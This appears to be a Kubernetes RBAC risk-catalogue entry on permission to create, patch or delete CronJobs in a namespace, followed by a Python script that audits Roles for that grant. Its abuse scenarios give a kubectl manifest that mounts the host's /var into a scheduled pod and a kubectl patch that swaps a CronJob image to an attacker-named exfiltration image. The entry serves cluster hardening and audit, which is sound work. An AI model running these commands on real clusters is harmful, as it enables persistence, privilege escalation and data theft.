Manage CronJobs in a namespace (scheduled privileged execution, persistence)
Elevation of Privilege
High
Overview
Field | Value |
---|---|
ID | 1040 |
Name | Manage CronJobs in a namespace (scheduled privileged execution, persistence) |
Risk Category | Elevation of Privilege |
Risk Level | High |
Role Type | Role |
API Groups | batch |
Resources | cronjobs |
Verbs | create, update, patch, delete |
Tags | Persistence PotentialPrivilegeEscalation Tampering WorkloadLifecycle |
Description
Grants permission to create, update, or delete CronJobs within a specific namespace. This can be used to schedule the execution of potentially privileged pods, enabling privilege escalation, persistence, and tampering within that namespace.
Abuse Scenarios
- Create a new CronJob with a hostPath mount in the namespace.
```bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: batch/v1
kind: CronJob
metadata:
  name: hostpath-cronjob
spec:
  schedule: "*/5 * * * *" # Every 5 minutes
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: hostpath-container
            image: busybox
            command: ["/bin/sh", "-c", "echo 'Hello from cronjob' >> /host-var/log/cron.log"]
            volumeMounts:
            - mountPath: /host-var
              name: host-var
          volumes:
          - name: host-var
            hostPath:
              path: /var
          restartPolicy: OnFailure
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
```
- Update an existing CronJob’s image to a malicious one.
```bash
kubectl patch cronjob <cronjob-name> -n <namespace> --type='json' -p='[{"op": "replace", "path": "/spec/jobTemplate/spec/template/spec/containers/0/image", "value": "attacker/malicious-job"}]'
# Example: kubectl patch cronjob data-sync -n production --type='json' -p='[{"op": "replace", "path": "/spec/jobTemplate/spec/template/spec/containers/0/image", "value": "attacker/data-exfiltrator"}]'
```
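To find which Roles carry the grant this rule describes, the following added example (not part of the original page) scans the parsed output of `kubectl get roles -A -o json` for rules covering `cronjobs` in the `batch` API group with any of the listed write verbs, treating `*` as a match. The sample roles are constructed, the function name is hypothetical, and reporting a Role that holds any one of the four verbs is an assumption about how strictly to audit.

```python
import json

# Verbs this rule flags on batch/cronjobs (from the rule's Verbs field).
WRITE_VERBS = {"create", "update", "patch", "delete"}

# Constructed sample in the shape of `kubectl get roles -A -o json` output.
SAMPLE = json.loads("""
{"items": [
  {"metadata": {"namespace": "batch-jobs", "name": "cron-admin"},
   "rules": [{"apiGroups": ["batch"], "resources": ["cronjobs"],
              "verbs": ["get", "list", "create", "patch"]}]},
  {"metadata": {"namespace": "dev", "name": "ns-wildcard"},
   "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
  {"metadata": {"namespace": "dev", "name": "cron-viewer"},
   "rules": [{"apiGroups": ["batch"], "resources": ["cronjobs"],
              "verbs": ["get", "list", "watch"]}]}
]}
""")


def _covers(values, wanted):
    """True if an RBAC rule list names `wanted` or uses the '*' wildcard."""
    return "*" in values or wanted in values


def cronjob_write_grants(role_list):
    """Return (namespace, role, verbs) for each Role that can write CronJobs.
    resourceNames restrictions are ignored, so narrowed rules are still reported.
    """
    findings = []
    for role in role_list.get("items", []):
        meta = role.get("metadata", {})
        granted = set()
        for rule in role.get("rules") or []:
            if not _covers(rule.get("apiGroups", []), "batch"):
                continue
            if not _covers(rule.get("resources", []), "cronjobs"):
                continue
            verbs = set(rule.get("verbs", []))
            granted |= WRITE_VERBS if "*" in verbs else verbs & WRITE_VERBS
        if granted:
            findings.append((meta.get("namespace"), meta.get("name"), sorted(granted)))
    return findings


if __name__ == "__main__":
    for ns, name, verbs in cronjob_write_grants(SAMPLE):
        print(f"{ns}/{name}: {', '.join(verbs)}")
```

Each finding still needs its RoleBindings checked to see which subjects actually receive the grant.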